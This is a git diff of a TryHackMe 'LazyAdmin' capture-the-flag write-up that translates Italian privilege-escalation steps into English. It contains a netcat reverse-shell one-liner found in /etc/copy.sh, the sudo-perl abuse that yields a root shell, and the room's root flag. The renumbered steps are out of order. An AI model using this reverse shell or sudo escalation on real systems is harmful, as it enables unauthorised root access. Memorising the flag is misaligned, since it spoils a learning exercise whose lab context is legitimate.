--- a/CTF-TryHackMe/1. Easy/LazyAdmin/6. Privilege Escalation.md
+++ b/CTF-TryHackMe/1. Easy/LazyAdmin/6. Privilege Escalation.md
@@ -1,4 +1,5 @@
-1) Cerchiamo la lista dei comandi sudo :  
+1) I search the list of sudo commands :  
+```
 $ sudo -l
 Matching Defaults entries for www-data on THM-Chal:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
@@ -6,20 +7,38 @@ Matching Defaults entries for www-data on THM-Chal:
 User www-data may run the following commands on THM-Chal:
     (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
 $ 
-
-2) apro il file di backup: cat /usr/bin/perl /home/itguy/backup.pl
-3) Dentro il file troviamo: system("sh",  "/etc/copy.sh")
-4) Apriamo questo file: cat /etc/copy.sh
+```
+2) I open the file of backup: 
+```
+cat /usr/bin/perl /home/itguy/backup.pl
+```
+4) Inside this file I find: 
+```
+system("sh",  "/etc/copy.sh")
+```
+6)I open this file ( /etc/copy.sh): 
+```
    cat /etc/copy.sh
    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
+```
+5) I see all permession that It has this file:  
+```
+  -rw-r--rwx   1 root root      81 Nov 29  2019 copy.sh
+``` 
 
-5) vediamo i permessi che ha il file copy.sh:  cd /etc  
- permessi --> -rw-r--rwx   1 root root      81 Nov 29  2019 copy.sh
- 
-(Possiamo vedere che noi possiamo scriverci w, leggerlo r, e eseguirlo x, ma la cosa più interessante e che viene eseguito come root quindi possiamo usarlo per spawnarci una shell root)
-
-6)  Sovrascrivamo il file copy.sh : echo "/bin/bash" > /etc/copy.sh
-7) Poi eseguiamo come super utente il file /usr/bin/perl /home/itguy/backup.pl:                       sudo /usr/bin/perl /home/itguy/backup.pl
-8) Ora che abbiamo la shell di root entriamo nella directory root: cd /root
-9) Leggiamo il file root.txt: THM{6637f41d0177b6f37cb20d775124699f}
-
+6) Overwrite the file "copy.sh" : 
+```
+echo "/bin/bash" > /etc/copy.sh
+```
+8) I execute like super user the file /usr/bin/perl /home/itguy/backup.pl:                       
+```
+sudo /usr/bin/perl /home/itguy/backup.pl
+```
+13) Now that I have the root shell, I enter inside the root directory: 
+```
+cd /root
+```
+15) I read the file root.txt: 
+```
+THM{6637f41d0177b6f37cb20d775124699f}
+```
